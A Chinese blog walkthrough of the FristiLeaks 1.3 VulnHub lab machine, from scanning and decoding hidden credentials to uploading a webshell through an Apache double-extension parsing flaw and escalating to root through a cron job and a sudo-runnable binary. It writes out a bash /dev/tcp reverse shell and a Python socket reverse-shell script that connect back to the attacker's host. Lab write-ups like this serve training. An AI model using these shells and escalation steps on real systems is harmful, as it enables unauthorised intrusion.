FristiLeaks_1.3靶场

原创 已于 2024-12-29 17:29:02 修改 · 1.1k 阅读 · 20 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#linux

于 2024-12-29 17:25:27 首次发布

https://download.vulnhub.com/fristileaks/FristiLeaks_1.3.ova靶机下载

一,网卡配置

1.主机发现

arp-scan -l

端口扫描

nmap 192.168.13.154 -A

发现80端口处于打开状态

访问

二,信息收集

目录扫描

dirb http://192.168.13.154/

没有发现什么可用的信息

访问web服务找找功能点


貌似没有可用功能点,拼接访问robots.txt

发现了三个路径访问发现

这里不是正确的URL,还得继续寻找

最终我们拼接访问首页的FRISTI,发现新页面

.

尝试弱口令爆破和sql注入,都无果

最后F12查看页面源码得到提示

说是对图片进行了base64加密

这是加密的值,我们对其进行解码

base64 -d decode.txt

发现是一个png类型的文件

我们将其输出到png文件中查看

可能是密码

我们再利用源码中的留言者作为用户,尝试登陆

eezeepz
keKkeKKeKKeKkEkkEk

登陆成功
出现了上传文件的功能点

三.getshell

上传一句话木马,失败

这里想起来它的中间件是apache

可以利用apache的解析漏洞,去绕过

在Apache1.x/2.x版本中,Apache默认一个文件可以有多个以点分割的后缀,解析文件的规则是从右到左开始判断解析,如果后缀名为不可识别文件解析,就再往左判断。直到识别到合法后缀才进行解析。如 1.php.png

上传成功我们去路径看看

http://192.168.13.154/fristi/uploads/1.php.png

成功解析

用蚁剑连接

成功获取shell

反弹shell

先用kali监听4444端口

nc -lvvp 4444

蚁剑打开虚拟终端 输入

bash -c 'bash -i >& /dev/tcp/192.168.13.143/4444 0>&1'

反弹成功

四,提权

1.sudo提权

.

sudo -l没有权限,查看home下的用户

发现有admin、eezeepz、fristigod三个用户

在eezeepz家目录下找到notes.txt

翻译一下:

我让你可以做一些自动检查,但我只允许您访问/usr/bin/*系统二进制文件然而,我确实复制了一些额外的经常需要的命令到我的homedir:chmod、df、cat、echo、ps、grep、egrep,这样您就可以使用它们了来自/home/admin/不要忘记为每个二进制文件指定完整路径!

只需在/tmp/中放入一个名为“runthis”的文件,每行一个命令。这个输出转到/tmp/中的文件“cronresult”。它应该以我的帐户权限每分钟运行一次

可以在/tmp/目录下放一个文件名为runthis的脚本文件,反弹shell

import socket,subprocess,os;
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);
s.connect(("192.168.121.171",8888));
os.dup2(s.fileno(),0); 
os.dup2(s.fileno(),1); 
os.dup2(s.fileno(),2);
p=subprocess.call(["/bin/sh","-i"]);

我这里使用kali开启远程服务,下载到目标机器上

然后运行这串命令

kali开启8888端口监听,反弹成功

echo "/usr/bin/python /tmp/rev_shell.py" > /tmp/runthis

获取admin用户的交互式shell

python -c 'import pty; pty.spawn("/bin/bash")'

看看有啥

有两个txt、两个py脚本,看看里面有啥信息

有两串base64编码值和一个编码脚本

whoisyourgodnow.txt
=RFn0AKnlMHMPIzpyuTI0ITG
 
cryptedpass.txt
mVGZ3O3omkJLmy2pcuTq
 
 
cryptpass.py
import base64,codecs,sys
 
def encodeString(str):
    base64string= base64.b64encode(str)
    return codecs.encode(base64string[::-1], 'rot13')
 
cryptoResult=encodeString(sys.argv[1])
print cryptoResult

我们对脚本进行反向操作,将加密改为解密

import base64,codecs,sys
 
def decodeString(str):
  rot13string = codecs.decode(str[::-1], 'rot13')
  return base64.b64decode(rot13string)
 
print(decodeString(sys.argv[1]))

将其保存到kali上命名为1.py

运行1.py脚本解密两串base64值

第一串值疑似fristigod用户的密码,我们尝试登陆

sudo -l查看具有sudo权限的程序

发现可以fristi权限运行/var/fristigod/.secret_admin_stuff/doCom

尝试以fristi权限运行一下/var/fristigod/.secret_admin_stuff/doCom

sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom

说是该/var/fristigod/.secret_admin_stuff/doCom文件后面得跟着命令

输入个id试试

sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom id

是root权限,那么我们可以获取root的shell

sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom /bin/bash

提权成功

cjchsh
关注
(Vulnhub练习)-- fristileaks渗透实战
飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘
09-26 560
(Vulnhub练习)-- fristileaks渗透实战 下载地址 http://www.vulnhub.com/entry/fristileaks-13,133/ 目标主机IP:192.168.100.155 信息收集 信息收集的步骤基本上差不多,可根据工具简单写个shell脚本 #!/usr/bin/bash ip=192.168.100.$1 ping -c2 $ip &>/dev/null if [ $? -eq 0 ] ; then echo "$ip is
【vulnhub】---FristiLeaks_1.3靶机
qq_43168364的博客
08-22 1115
目录 一、实验环境 二、信息收集 三、渗透测试   1、漏洞发现和利用   2、提权 四、总结 一、实验环境 靶机:FristiLeaks: 1.3靶机(192.168.15.155) 攻击机:kali Linux(192.168.15.129) 相关设置 根据官网的提示这里需要给靶机设置MAC地址 设置好了之后就可以开心的玩耍了。 二、信息收集 主机发现 命令:nmap -sn 192.168.15.0/24 命令:arp-scan -l 命令:netdiscover -i eth0 -r
FRISTILEAKS: 1.3超详细靶机实战
weixin_68615160的博客
08-01 1061
网卡设置为nat模式,并修改mac地址为开启虚拟机后IP地址在终端显示。
Vulnhub靶机:FristiLeaks_1.3
qq_48904485的博客
03-19 1191
运行环境:Virtualbox攻击机:kali(10.0.2.15)靶机:FristiLeaks 1.310.0.2.12)目标:获取靶机root权限和flag靶机下载地址:https://www.vulnhub.com/entry/fristileaks-13,133/注意安装靶机的时候需要将靶机的MAC地址改为:08:00:27:A5:A6:76,否则靶机ip地址会获取不到。
【甄选靶场】Vulnhub百个项目渗透——项目十六:FristiLeaks_1.3(文件上传,py脚本改写,sudo提权,脏牛提权,源码获取)
人间体佐菲的博客
09-18 1070
网络安全,基础,靶场,信息安全,渗透测试,红队
VulnHub-FRISTILEAKS 1.3
热门推荐
江左盟的博客
12-02 1万+
简介 这是一台CTF类的靶机,比较考验脑洞,我个人不大喜欢,能想到作者的设计的点会觉得简单,想不到就觉得难。该靶机通过网页源码获取登录用户名和密码,然后利用Apache解析漏洞获取服务器权限,可利用脏牛直接提升至root用户权限,也可利用计划任务先获取admin用户权限,然后解密密文获得fristigod用户登录密码,最后利用SUID程序提升至root权限。 靶机下载地址:https://www.vulnhub.com/entry/fristileaks-13,133/ 信息收集 使用nmap --min-
和oscp相似的靶机-hackthebox & vulnhub (OSCP-LIKE HACKTHEBOX & VULNHUB)
冬萍子癸水
04-06 3454
每台都做一做,然后记录在博客里.供自己和大家一起学习.
FristiLeaks_1.3
cxyzupup的博客
01-10 852
FristiLeaks_1.3 项目地址:https://www.vulnhub.com/entry/fristileaks-13,133/ 提示: (1)靶机网络连接方式使用NAT模式 (2)该靶机做了地址绑定,因此需要设置固定物理地址才能获取IP地址;物理地址为:08:00:27:A5:A6:76 文章目录FristiLeaks_1.3一、信息收集1. 使用nmap收集端口服务信息:2. 查看tcp80端口:3. 使用gobuster工具对http服务进行枚举:3.1 查看/images目录:3.2 查
FristiLeaks靶机
m0_61995767的博客
07-30 753
FristiLeaks打靶记录
vulnhub渗透系列之FristiLeaks: 1.3
来到了学渣的博客
02-06 2356
我是啊锋,一个努力的学渣,作为一个刚进入安全大门的小白,我希望能把自己所学到的东西总结出来,分享到博客上,可以一起进步,一起交流,一起学习。 实验过程总结 1.该靶机安装好后自动提示了IP地址,所以直接探测存活的端口就行,发现与以往不一样的是它只开放了80端口,nmap同时也扫出来cola/sisi/beer三个目录。 2.进入80端web页面,登录到cola/sisi/beer发现图片提示主要...
Vulnhub-靶机-FristiLeaks 1.3
qq_43264813的博客
03-01 529
Vulnhub—靶机—FristiLeaks 1.3 本篇文章仅用于技术交流学习和研究的目的,严禁使用文章中的技术用于非法目的和破坏,否则造成一切后果与发表本文章的作者无关 地址:https://www.vulnhub.com/entry/kioptrix-level-1-1,22/ 文章目录Vulnhub—靶机—FristiLeaks 1.3一、信息收集二、漏洞利用三、Flag 一、信息收集 【步骤一】使用nmap确定目标靶机地址,对目标靶机进行全端口扫描: 【命令】nmap -n -p- 192.168
【vulnhub】FristiLeaks_1.3靶机
weixin_62162207的博客
08-01 381
FristiLeaks_1.3靶机:打靶训练
靶机:FristiLeaks_1.3
AzVoidSUN的博客
05-10 946
下载连接 https://download.vulnhub.com/fristileaks/FristiLeaks_1.3.ova.torrent https://download.vulnhub.com/fristilea ks/FristiLeaks_1.3.ova 运行环境 Virtualbox (二选一) Vnware Workstation player VMware用户将需要手动将VM...
Vulnhub 渗透练习(七)—— FRISTILEAKS: 1.3
shinygod的博客
02-19 632
仔细阅读一些留言或者是解释。可以利用漏洞探针快速查询漏洞。脏牛的简单利用,及影响版本。
vulnhub靶机渗透 FRISTILEAKS: 1.3
RestoreJustice的博客
03-18 371
​ 下载后用 VMware 或者 VirtualBox 打开,并配置好网卡,靶机与攻击机应置于同一网络下,靶机默认是桥接模式,能用攻击机连接到就行。这里连接到虚拟网卡1。冷静(fristi),这张图片就是首页的我们第二次看到再结合到上一张图片的提示,这张很有可能有提示。根据官网提供的说明,首先要将要求设置VMware虚拟机的MAC地址 08:00:27:A5:A6:76,然后开启VM。在图片中插入phpinfo和一句话木马,成功上传到 /uploads目录,根据前面的目录爆破可知上传路径。
5.100个渗透测试实战#5(FristiLeaks_1.3
qwsn
03-25 2819
目录 一、实验环境 二、实验流程 三、实验步骤 (一)信息收集——主机发现 1.查看kali的网卡和IP信息(网卡名:eth0,IP:192.168.97.129); 2.查看靶机页面; 3.探测特定网络内的主机存活状态(netdiscover、arp-scan、nmap); 4.分析所得; (二)信息收集——端口(服务)扫描; 1.扫描端口,以及端口对应的服务,以及靶机的运行...
FristiLeaks_1.3靶机
weixin_71232352的博客
08-01 421
FristiLeaks_1.3靶机
靶机渗透FristiLeaks1.3 ☀️新手详细☀️
君莫hacker的博客
09-08 8318
靶机FristiLeaks1.3的目录0x01靶机描述0x02环境搭建0x03靶机渗透一、 信息收集二、 漏洞挖掘三、 漏洞利用四、 提权0x04实验总结 0x01靶机描述 靶机基本信息: 链接 https://www.vulnhub.com/entry/fristileaks-13,133/ 作者 Ar0xA 发布日期 2015年12月14日 难度 中等 靶机基本介绍: 一个小型虚拟机是为一个叫做Fristileaks的荷兰非正式黑客聚会而设计的。意味着可以在几个小时内完成,
FRISTILEAKS: 1.3打靶渗透【附代码】(权限提升)
网安学习
08-01 1063
FRISTILEAKS: 1.3打靶渗透【附代码】(权限提升)-脏牛提权、SUDO提权
Ubuntu_CTF靶场
最新发布
06-18
### Ubuntu CTF 靶场设置或使用 在搭建和使用基于Ubuntu的CTF靶场时,需要考虑操作系统的选择、环境配置以及具体的工具应用。以下是详细的说明: #### 1. 操作系统选择 Ubuntu是一个广泛使用的Linux发行版,因其...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值